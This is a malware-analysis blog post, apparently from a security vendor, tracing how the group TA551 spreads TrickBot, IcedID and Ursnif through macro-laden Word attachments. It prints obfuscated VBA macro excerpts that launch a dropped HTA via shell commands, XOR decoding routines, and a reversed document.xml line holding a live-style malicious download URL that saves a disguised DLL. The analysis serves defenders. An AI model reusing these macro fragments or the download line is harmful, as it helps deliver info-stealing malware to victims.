The ASEC analysis team has been continuously updating the blog with information on malicious macro files and has been urging users to take caution. This post will introduce a type of word macro file distributed recently by the attack group TA551, showing changes in an average of 1 week.
For the distribution of malware, the group usually sends documents that contain malicious macros using emails. The operation method of the DOC file that downloads additional malware after dropping HTA file upon enabling macro is the same. The key aspect of the change is the types of malware that are additionally downloaded.
The following is an explanation of how the malicious macro in the diagram above works.
The attacker sends an email with attachments that consist of malicious MS Word documents. Once the recipient opens the email, downloads the attached file, and runs the macro, the malicious HTA file gets dropped. A code that exists within the HTA file can download additional malware from the external URL. If the URL link is valid, the ultimate malware that the attacker intended to distribute is downloaded and starts to operate.
The names of malicious DOC files used to distribute TrickBot malware this time and of dropped HTA files (same as that of DLL files) are displayed in the table shown above.
The distribution purpose of TrickBot did not change much, and the same can be said for the operation method of the macro code found in the distribution process of altered malicious macro files continuously used by the TA551 group. It used to be IcedId malware that TA551 steadily distributed since last year, however, the end malware to be downloaded is slightly varying, which is a notable change.
[document.xml] – excerpt
eslaF ,"huDSHMPsgn=hcraes&xt6X4fLT=di&BPHSK=resu&sSW7qpNxMucIcoxFPTJ=jibxO&00oYo19C=hcraes&9vGttM=dic&64BBY6eIrpNf1DyB=XhF&hSlYk=resu?1uzam/NpGbPSg3Ddn55UEAB0gi62SxY3C48ybaZA/sFOKURIghF2uY7XcTM6FrDEGxffw/adda/moc.grebotcotseb//:ptth" ,"TEG" nepO.ptthlmx
2 ,"gpj.neercSnoitpac\atadmargorp\:c" eliFoTevaS.maerts
[Macro Code] – excerpt
Attribute VB_Name = "listboxArray" Function templateCCurr(removeDocClass) Debug.Print Shell("" + genericLnkResponse("explorer ")) End Function Function genericLnkResponse(removeDocClass, Optional dateLibsW = "c:\progra", Optional btnLocal = "ta") genericLnkResponse = removeDocClass & dateLibsW & "mdata\vbaQueryCount.h" & btnLocal End Function Function initTitle(arr As Variant) Dim out As String out = "" For cnt = 1 To UBound(arr) out = out & Chr(arr(cnt) Xor 100) Next initTitle = out End Function
Attribute VB_Name = "captionO" Function lnkObject(queryArray) Shell singleLocal("cmd /c ") End Function Function singleLocal(queryArray, Optional listboxLng = "c:\\users\\public\\winSelBefore.h", Optional oOSize = "t", Optional optionDRef = "a") singleLocal = queryArray & listboxLng & "" & oOSize & optionDRef End Function Function indexDocTmp(arr As Variant) Dim out As String out = vbNullChar For cnt = 1 To UBound(arr) out = out & Chr(arr(cnt) Xor 101) Next indexDocTmp = out End Function
Taking a look into the macro code for each version that shows changes, we can see the pattern of utilizing the internal data of the initially obfuscated document.xml object and creating hta that is obfuscated for the second time. A simple sample shows that it can slightly change the process of combining commands that execute the hta file. In certain types, they may use the data within document.xml that simply reverses the text order as shown above.
Recently distributed sample shows that when you enable macro in the word file that includes malicious macro as shown in Figure 2, the HTA file from Figure 3 is dropped to the C:\ProgramData path. Unobfuscating a part of the code within the HTA file reveals the following code that downloads additional malware (vbaQueryCount.jpg) from the external malicious URL and saves it in the C:\Users\Public path. The jpg file downloaded is not an image file, but the DLL malware executed with regsvr32.exe.
TrickBot is a malware that is ultimately downloaded, and it attempts malicious behaviors of stealing sensitive information such as that of web browser and financial transaction from the user PC. As shown in Figure 8 (process tree provided by AhnLab RAPIT, malware auto-analysis infrastructure), the malware collects the information of the infected PC using normal processes such as ipconfig.exe, net.exe, nltest.exe, etc.
Recent trend in changes shows that the malware that ultimately runs has changed to financial info-stealing malware.
- IcedID download type
- Ursnif download type
- Trickbot download type
Users should refrain from opening emails from unknown sources, and should not run or enable macro when downloading attachment files. If the security level of the document program is set to low, macro may run automatically without any notification. Therefore, users should maintain the security level high to prevent any unintended features from being run.
Also, users are advised to update the anti-malware engine pattern to its latest version.
AhnLab’s anti-malware product, V3, detects and blocks the types of malicious files introduced in this post (DOC, HTA, DLL, etc.) using the following aliases.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.